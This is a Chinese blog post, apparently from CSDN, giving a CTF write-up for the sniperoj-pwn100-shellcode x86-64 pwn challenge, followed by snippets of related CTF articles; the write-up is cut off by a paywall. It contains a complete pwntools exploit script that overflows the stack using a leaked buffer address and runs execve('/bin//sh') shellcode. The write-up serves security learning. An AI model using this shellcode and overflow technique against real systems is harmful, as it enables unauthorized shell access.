20.03.25(还有sniperoj-pwn100-shellcode-x86-64的wp)

最新推荐文章于 2023-03-30 10:17:50 发布
最新推荐文章于 2023-03-30 10:17:50 发布
阅读量693 收藏
点赞数
分类专栏: Pwn 学习经历
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eeeeeight/article/details/105106556
版权
本文是作者关于Pwn挑战的做题记录,主要介绍了sniperoj-pwn100-shellcode的问题解决过程。由于PIE的开启,地址动态变化,但通过找到buf地址可以控制栈来让IP指向shellcode。exp中提到,由于位移和限制,shellcode大小需小于等于0x20字节。此外,文章提出了一个问题:为何不直接使用打印出的地址并在EIP前的0x20字节内写shellcode,这留给读者思考。
摘要由CSDN通过智能技术生成

Pwn的做题记录:
       来自两届BJD都被暴打的彩笔总结(第一届还没学导致pwn爆零,第二届才学两天导致只做出一道pwnQAQ)
       sniperoj-pwn100-shellcode的wp       :
       因为开启了PIE所以,地址在变化(断点什么的基本不可以设置地址了)但通过printf("Do your kown what is it : [%p] ?\n", &buf, 0LL, 0LL);我们便知道了buf的地址,相对应的,我们就取得了栈的地址,就可以通过覆盖让ip指向我们的shellcode啦~
exp如下:
#!/usr/bin/env python
from pwn import *
context.log_level='debug'
s=process('/home/thu1e/Desktop/shellcode')
s.recvuntil('[')`` ``addr=s.recvuntil(']',drop=True)
address=int(addr,16)+24+8
payload=('a'*24+p64(address)+"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05")

s.sendline(payload)
s.interactive()
       因为之前计算出位移为24字节(填充垃圾栈的大小+

最低0.47元/天 解锁文章
北岛静石
关注
专栏目录
SniperOJ pwn100-bof writeup
0_Re5et
04-27 2476
在大佬的指导下拿到了人生中第一个pwn flag。感觉pwn真的帅的飞天了!在此简单记录一下思路。因为还没有补相关的基础知识,哪里不对的话还请各位大佬指出~比心~1. 首先查看文件版本命令 file filename 可以看到程序是64bit,linux平台下的 在这里补充一下查看本机操作系统位数的命令: getconf LONG-BIT 然后就去对应的系统下就ok了2. 查看源代码或运
sniperoj-pwn100-shellcode-x86-64(writeup)
y920312的专栏
11-08 1089
sniperoj-pwn100-shellcode-x86-64 1、首先checksec文件属性 root@kali:~/pwn_learn/wiki# checksec sniperoj_shellcode [*] '/root/pwn_learn/wiki/sniperoj_shellcode' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX
sniperoj-pwn100-shellcode-x86-64
qq_33769475的博客
12-15 2739
分析 题目下载 查看保护,ret2shellcode类型的题是没有NX保护的 ┌──(root????e267254b2ec9)-[/home/pwn] └─# checksec shellcode [*] '/home/pwn/shellcode' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: P
栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(二)shellcode
沧海一粟
02-23 9528
栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(二)shellcode
SniperOj-shorter-shellcode-x86
weixin_30826761的博客
05-29 93
shell-storm这里可以有一些可以用的shellcode,不过自己写才是biner的骄傲 /奋斗 0x00 不会写shellcode(和一条咸鱼有什么区别/哭) 0x01 这题目前有俩种解法 1. shellcode直接获取shell,这种解法需要较强的shellcode编写能力,因为只能输入27字节,要求shellcode1足够短 2. 先自己构造个read然后扩大读取字节,再获...
一个简单的 shellcode pwn题 广西首届网络安全选拔赛
qq_41071646的博客
06-05 795
这个题 唯一的难点就是 shellcode 的 只是给了 0x14的大小 本来这个题 不打算发博客 但是有小姐姐看 ~~~ 就写一篇发上来把 然后我们看一下 程序的大概内容 {说一个很沙雕的事情 由于这个程序的特殊性 f5没有办法 看出来 然后 负责人这个b心情又不好 然后我把这个程序的 call eax 搞成nop f5 一把梭 } 23333 所以 ...
[CTF-PWN]攻防世界新手村-when_did_you_born[wp]
murongxuege的博客
09-29 631
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 436
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
#WP ELF x86 - Stack buffer overflow - C++ vtables
dydxdz的博客
03-12 1460
题目地址:rootme 0x01 题目分析 Source Code: #include <stdlib.h> #include <stdio.h> #include <string.h> #include <ctype.h> #include <stdio.h> // g++ -m32 ch20.cpp -o ch20 -...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
NKCTF PWN wp
山高路远
03-30 634
NKCTF
[BUUCTF]PWN——x_ctf_b0verfl0w(汇编代码写shellcode+jump esp指令劫持esp)
mcmuyanga的博客
02-04 1384
x_ctf_b0verfl0w 附件 步骤 例行检查,32位程序,开启了RELRO(不可改写got表) 本地试运行一下程序,看看大概的情况 32位ida载入 fgets可以溢出,但是只可以溢出0x32-0x20-0x4=14字节,由于没有开启nx,首先想到的是shellcode,0x20肯定放不进pwntools生成的shellcode,只能自己手写,但是得想办法劫持esp去执行我们的shellcode 在hit函数中找到了jump esp的gadget 因此我们可以构造这样的栈
CTF-PWN-note-service2 (堆中shellcode执行)
SuperGate的博客
11-18 574
checksec Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments 发现没有开启NX,因此很有可能是要我们将sh...
有趣的Shellcode和栈
热门推荐
whklhhhh的博客
03-26 2万+
学弟问了一个ctf-wiki上pwn入门题的知识点,本身没什么意思 题目下载链接 - sniperoj-pwn100-shellcode-x86-64 题目简介 很明显栈溢出,buf位于栈顶,栈空间为0x10个字节(可以从buf的位置rsp+0rbp-10h看出),所以栈分布为 内容 偏移 buf rsp last_rbp rsp+0x10 ret_addr rsp+0x...
PWN-shellcode获取与编写
杀生丸?不,其实我要的是桔梗
03-16 1万+
当我们在获得程序的漏洞后,就可以在程序的漏洞处执行特定的代码,而这些代码也就是俗称的shellcode。 而shellcode该怎么获得呢? 一、获取集成写好的 1.From pwntools (1)先设置目标机的参数 context(os=’linux’, arch=’amd64’, log_level=’debug’) 1. os设置系统为linux系统,在完成ctf题目的...
pwn gdb 常用命令
zszcr的博客
03-27 4760
gdb 常用命令=======r 执行程序至断点c 继续执行程序s 单步执行n 单步执行 如果使调用函数 则进入函数内部x 查看指定地址的内存地址的值  x/(n,f,u为可选参数) n为需要显示的内存单元个数  f为显示格式:               x(hex) 按十六进制格式显示变量。               d(decimal) 按十进制格式显示变量。               ...
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值